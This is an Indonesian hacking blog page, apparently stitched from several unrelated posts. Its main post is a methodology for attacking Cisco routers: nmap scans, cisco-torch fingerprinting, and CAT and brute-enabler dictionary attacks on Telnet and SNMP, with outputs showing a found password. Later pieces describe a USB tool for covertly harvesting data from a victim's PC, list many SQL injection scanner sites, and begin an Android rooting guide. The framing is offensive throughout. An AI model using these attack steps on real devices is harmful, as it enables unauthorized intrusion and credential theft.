CISCO Hacking Methodology

lirva32 [at] yahoo [dot] com

"semua yang saya tulis di blog ini.... saya dedikasikan untuk kedua putri saya :
Faiza Debian dan Fivana Gutsy "

Yap… betul sekali.. kalo saya sudah lama tidak menulis   blog yang saya cintai ini…bukan alasan “sibuk” tapi memang sibuk di dunia nyata… pembodohan yang sangat keji sekali jika di dunia nyata kita tidak bisa belajar… tidak bisa melakukan kegiatan oprex2….

Sudahlah… yang terpenting hari ini saya berusaha menulis sesuatu yang mungkin saja berguna untuk Anda…atau bahkan hanya menjadi sampah buat otak Anda…saya tidak peduli… yang terpenting adalah niat berbagi saya untuk dunia IT bangsa ini…..lol

CISCO Hacking Methodology…? Iya, betul sekali materi tersebut yang mau saya bahas karena untuk melakukan penyerangan terhadap jaringan berbasis Router CISCO dan Catalyst CISCO memerlukan sebuah metode yang harus kita lakukan.

Ampuhkan metodenya…?? haaaa…ha…..ha…, ini hanya metode... yang namanya metode hanya menjelaskan langkah2 yang bisa dipergunakan untuk menempuh perjalanan hackingnya. Masalah “bobol” atau “tidak” ya sangat bergantung pada penyetingan terhadap perangkat tersebut… tapi tetap berpegang teguh “Nothing System 100% Secure…!!!”.

Mari kita berbicara Methodologi yang biasa dipergunakan dalam melakukan penyerangan terhadap jaringan berbasis router or catalyst CISCO.

Adapun beberapa metode yang biasa dipergunakan dalam melakukan penyerangan terhadap jaringan berbasis CISCO roter dan catalyst, antara lain :

1. Port Scaning : metoda ini digunakan untuk mengetahui “live host” dalam jaringan yang kita targetkan.

2. Fingerprinting : metoda ini digunakan untuk mendapatkan informasi lebih dari devices yang kita jadikan target

3. Password Guessing : metoda ini biasa digunakan untuk mendapatkan user name dan password terhadap target

4. SNMP Attack : metoda untuk melakukan pengujian dan penyerangan terhadap protokol SNMP.

5. Telnet Attack : metoda untuk melakukan pengujian dan penyerangan terhadap layanan TELNET

6. Web Browser Attack : metoda untuk melakukan pengujian dan penyerangan terhadap HTTP/HTTPS Authentication attack

7. TFTP : metoda untuk melakukan IOS copy dan IOS backup.

8. CISCO Bug : memanfaatkan bug dari IOS yang belum di patch.

Mari kita kenal methodologi tersebut lebih dekat.... biar kita tidak ”galaw” lagi.... kekekkeke....

1. Port Scanning

-  nmap

o Proses scanning sangat efektif sekali jika kita melakukan scanning langsung ke CISCO devices dengan melakukan pengecekan langsung pada TCP dan UDP, maka gunakan perintah nmap, sebagai berikut :

- TCP scan: lakukan pengecekan terhadap IP target dan pengecekan terhadap port, mulai dari port 1 – 65535 hanya pada IP yang menjadi target saja. Hasil pengecekan akan tersimpan pada file TCP.scan.txt.

Perintah yang diperguakan :

nmap  -sT  -O  -v  -p  1-65535  <IP>  -oN  TCP.scan.txt

-  UDP scan: lakukan pengecekan terhadap UDP, mulai dari port 1 – 65535 pada - This will perform a UDP scan, be verbose,  scan ports 1 – 65535 hanya pada IP yang menjadi target saja. Hasil pengecekan akan tersimpan pada file UDP.sca.txt.

Perintah yang dipergunakan :

nmap  -sU  -v  -p  1-65535  <IP>  -oN  UDP.scan.txt

o CISCOS | ciscos

-    Nah, tool ini merupakan tool yang sangat saya gandungi…ada di Backtrack 4 sampe Bactrack 5 R1 juga masih ada.
ciscos biasa dipakai untuk melakukan pencarian CISCO devices yang ada dalam suatu jaringan dengan memanfaatkan CIDR network range.

Usage: ./ciscos <IP> <class>

2. Fingerprinting

-    Nah, kalo dikalangan underground yang ada tools yang biasa digunakan untuk melakukan fingerprinting terhadap CISCO devices namanya : cisco-torch. Aplikasi ini akan melakukan FingerPrinting terhadap beberapa layanan diantaranya : SSH, Telnet dan HTTP.

# cisco-torch.pl -A 125.125.100.78

List of targets contains 1 host(s) 14489:  
Checking 125.125.100.78... Fingerprint:2552511255251325525324255253311310
Description:Cisco IOS host (tested on 2611, 2950 and Aironet 1200 AP) Fingerprinting Successful

Cisco-IOS Webserver found  
HTTP/1.1 401 Unauthorized
Date: Mon, 12 Oct 2011 11:34:11 GMT
Server: cisco-IOS Accept-Ranges: none
WWW-Authenticate: Basic realm="level_15_access"
401 Unauthorized

-    Okay…kita juga bisa pake nmap untuk mengidentifikasi port2 yang terbuka, yang paling harus kita uji adalah port 23 (Telnet), port 80 (HTTP) dan SNMP agent receives requests on UDP port 161 & 162

# nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt

# nmap -sV -O -v -p 161,162 <IP> -oN UDP.version.txt

3. Password Guessing

-  Nah, kali ini kita akan berhadapan sama tool yang namanya : CAT (Cisco Auditing Tool), biasanya digunakan untuk melakukan dictionary attack terhadap Telnet server dan SNMP agent router dan catalyst CISCO.

# ./CAT  -h  <IP>  -a  password.wordlist

# CAT -h 125.125.100.78 -a /tmp/dict.txt

Guessing passwords:
Invalid Password: 1234
Invalid Password: latihan
Invalid Password: cisco
Password Found: england

-     Ada lagi nih.. yang fungsinya juga sama seperti CAT yaitu : brute-enabler, tools ini memiliki kemampuan untuk melakukan cracking terhadap Telnet.

# ./enabler <IP> [-u username] -p password /password.wordlist [port]

# ./enabler  125.125.100.78 telnet  /tmp/dict.txt 
[`] OrigEquipMfr... wrong password
[`] Cisco... wrong password
[`] agent... wrong password
[`] all... wrong password
[`] possible password found: england

- NightArrow USB Forensics Tool -

Simple nih.... bener2 simple.....;)
Ya… melakukan forensic hanya bermodalkan usb flashdisk saja… tentu PC local yang menjadi target loh... why…?? Kalo kita harus mencolokkan usb flashdisk yang kita miliki ke komputer target.

Kita bisa mendapatkan informasi dari PC yang dijadikan target berupa informasi2 penting yang bisa digunakan dalam proses gainning access... tidak hanya itu....komputer korban semakin bisa Anda kuasai sebebas mungkin......;)

Informasi yang bisa didapatkan, antara lain :

Retrive System Information :

· User profile name

· Name of the domain controller that validated the current login session

· Display Routing tables and gateway

· MAC address

· Operating system version

· Display number of processors

· List of local administrators

· Network adapters and IP address

· Task list

Retrieve Remote Information :

· Arp information

· Listed dimain users

· List of local shares

· List of users

· View current connected users

· List current shares with ID tags

· Current IPs connected

- Online SQLi Scanner List -

http://laba-laba.co.cc/vuln_scanner/

http://scanner.drie88.tk/

http://xaxnerx.byethost13.com/scan.php

http://www.shad0w.info/sqli.php

http://h1.ripway.com/TroyH2O/index.php/

http://webhosting.blackoutaio.com/~sqli/


http://the-invisible.org/sqli.php

http://wolfscps.com/gscanner.php

http://www.izyvn.biz/dork/

http://www.shell.20x.cc/SQLi.php

http://antsoldier.co.tv/sql_scanner.php

http://generator.0fees.net/scanner/

http://www.bigwavos.com/scanner/sqli.php

http://webhosting.blackoutaio.com/~sqli/

http://cattuong.net/

http://cyberforum-online.com/tools/sqli.php

http://scanner.masterskillstudent.com/

http://l3chpr0.co.cc/scan1.php

http://scanner.drie88.tk/

http://partycaps.net/sqli.php

http://www.dantruongit.net/tools/Hack-Shop/SQLI-Scan/

http://www.sunmagazin.com/tools/hack/SQLI-Scan/

http://bucattaokhong.net/tools/Hack-Shop...anshop.php

http://www.bshttp.co.cc/__web/scanner/

http://blackxfile.com/123.php

http://74.52.154.246/~dieplane/winkero2/...SQLI-Scan/

http://vietgb.com/checked.bz/tools/Hack-Shop/SQLI-Scan/

http://148159.com/toolsug/tools/tools/Ha...SQLI-Scan/

http://localvn.biz/Tools/tools/Hack-Shop/SQLI-Scan/

http://www.be007.gigfa.com/scanner/scanner.php

http://sadnoel.com/tools/hack/SQLI-Scan/

http://www.now-4ever.com/public/scanshop.php

Thx
Lirva32

author : This e-mail address is being protected from spambots. You need JavaScript enabled to view it

Nge-root Android…??? Hhhhmmmm, sebuah seni untuk mentake over proteksi Android. Jadi kalo Android yang Anda miliki sudah di ‘root’ berarti kebebasan menjadi milik Anda...loh kok...??? jawabnya tentu iya... karena devices Android yang sudah berhasil di ’rooted’ berarti Anda bisa bebas malakukan instalasi berbagai aplikasi yang membutuhkan akses ’SU’ a.k.a Super User.  Jika Anda belum memahami tentang rooting, silahkan Anda baca2 disini : http://goo.gl/AFiQo.

Nah, kali ini saya menulis bagaimana melakukan "rooting" terhadap devices Android milik anak saya. Android yang di "rooting" bermerk Axioo Picopad.

Persiapan :

1. Android Devices, saya mempergunakan : Axioo Picopad

2. Cable miniUSB yang akan digunakan menghubungkan komputer ke Android devices

3. SuperOneClick : http://lirva32.org/download/s1click.zip

*aplikasi ini sudah saya modifikasi agar sesuai dengan devices Axioo Picopad dan Samsung Galaxy, jadi tidak disarankan untuk dipergunakan pada devices lain... resikonya ditanggung sendiri loh...*

Saya telah melakukan penggunaan :

• Superuser v2.3.6.1
• SU binary v2.3.1-ef

4. PC or Notebook

Perhatian :

1. Pastikan devicess Android Anda dalam kondisi Full battery... hal ini kudu dan wajib karena jika bettery Android habis ketika proses "rooting" maka wassalam sudah..... ingat proses "rooting" akan menghilangkan garansi !!!

2. Jika Anda mempergunakan notebook, pastikan juga battery Notebook yang Anda pergunakan juga dalam kondisi Full bettery untuk menjamin keberlansungan proses "rooting".